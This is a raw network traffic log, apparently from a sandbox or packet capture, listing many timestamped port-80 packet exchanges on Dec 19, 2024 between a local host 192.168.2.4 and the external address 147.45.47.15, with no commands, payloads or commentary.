Dec 19, 2024 08:52:37.270164013 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.270219088 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.270586967 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.270639896 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.272777081 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.272952080 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.273020983 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.274390936 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.274486065 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.274555922 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.276755095 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.276978016 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.277075052 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.278383970 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.278397083 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.278445005 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.280915022 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.281152010 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.281203985 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.282694101 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.282924891 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.282974005 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.285105944 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.285326004 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.285425901 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.286411047 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.286571980 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.286674023 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.291084051 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.291399956 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.291472912 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.294903040 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.294934988 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.295011997 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.299515009 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.299638987 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.299695969 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.303426027 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.303440094 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.303486109 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.308018923 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.308129072 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.308175087 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.316536903 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.316550970 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.316605091 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.324837923 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.324846983 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.324901104 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.333201885 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.333209991 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.333265066 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.341680050 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.341801882 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.341852903 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.343825102 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.344568014 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.344719887 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.344770908 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.349874973 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.349921942 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.349998951 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.381839037 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.381994963 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.382057905 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.383471012 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.383572102 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.383656025 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.386415958 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.386583090 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.386626005 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.389533997 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.389588118 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.389647961 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.392656088 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.392669916 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.392858028 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.395379066 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.395582914 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.395673990 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.398201942 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.398372889 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.398454905 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.401099920 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.401452065 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.401556969 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.403853893 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.404072046 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.404124022 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.406563044 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.406820059 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.406867981 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.409198046 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.409377098 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.409447908 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.411809921 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.412012100 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.412070990 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.414393902 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.414666891 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.414735079 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.416016102 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.416094065 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.416177988 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.416829109 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.416866064 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.416928053 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.417294025 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.417754889 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.417886019 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.418423891 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.418479919 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.418638945 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.419576883 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.420032024 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.420088053 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.420937061 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.421184063 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.421246052 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.422185898 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.422360897 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.422425032 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.422719002 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.422729969 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.422780037 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.424824953 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.425013065 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.425131083 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.427335978 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.427421093 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.427557945 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.427567005 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.428220987 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.428283930 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.429239988 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.429476976 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.429537058 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.430033922 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.430233002 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.430315971 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.432398081 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.432445049 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.432566881 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.432887077 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.432894945 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.432940006 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.435401917 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.435410023 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.435524940 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.437392950 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.437458038 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.437536001 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.437850952 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.438249111 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.438257933 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.438308001 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.438915968 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.439024925 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.440707922 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.440716982 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.440867901 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.442115068 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.442291021 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.442300081 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.442903996 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.443111897 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.443156004 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.445597887 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.445739985 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.445787907 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.446094036 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.446386099 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.446429968 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.446923018 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.446990013 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.447173119 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.448137999 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.448350906 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.448443890 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.450695992 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.450988054 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.451042891 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.451739073 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.451782942 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.451967955 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.453344107 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.453500986 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.453548908 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.454401016 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.454704046 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.454761028 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.456007957 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.456115007 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.456290007 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.456706047 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.456748009 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.456873894 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.458497047 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.458806038 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.458844900 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.461141109 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.461441040 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.461534977 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.461668015 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.461675882 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.461730003 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.462502956 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.462917089 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.463061094 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.463072062 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.463078976 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.463150978 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.463995934 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.464101076 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.464221954 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.465051889 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.465208054 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.465254068 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.466125965 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.466237068 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.466314077 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.466700077 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.466706038 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.466773987 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.468905926 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.469120026 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.469178915 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.469980001 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.470129967 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.470232010 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.471985102 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.471998930 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.472006083 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.472012997 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.472034931 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.472062111 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.472214937 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.475073099 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.475245953 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.475298882 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.475840092 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.475895882 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.475956917 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.479515076 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.479691029 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.479748964 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.480196953 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.480406046 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.480453014 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.480716944 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.480768919 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.481065035 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.487180948 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.487186909 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.487201929 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.487207890 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.487238884 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.487294912 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.487884998 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.488147020 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.488199949 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.489671946 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.489928961 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.489988089 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.490210056 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.490266085 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.490593910 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.495863914 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.496072054 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.496189117 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.497289896 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.497297049 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.497353077 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.498008966 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.498014927 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.498054028 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.499440908 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.499774933 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.499835968 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.500298023 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.500304937 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.500353098 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.504245996 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.504422903 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.504582882 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.504733086 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.504786015 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.509119987 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.509238005 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.509332895 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.513925076 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.514075994 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.514202118 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.518800974 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.518842936 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.518913984 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.523750067 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.523869038 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.523927927 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.528424978 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.528536081 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.528630972 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.533271074 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.533492088 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.533545971 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.536386013 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.538007975 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.538243055 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.538326979 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.542994022 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.543039083 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.543091059 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.547713041 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.548008919 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.548069000 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.573775053 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.573827028 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.573937893 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.574985027 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.575046062 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.575192928 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.575367928 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.575407982 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.577445030 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.577750921 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.577905893 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.579577923 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.579718113 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.579879999 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.581513882 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.581696987 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.581753016 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.583612919 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.583909988 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.583964109 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.585819960 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.585901022 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.585983992 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.587744951 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.587882996 CET	80	49730	147.45.47.15	192.168.2.4
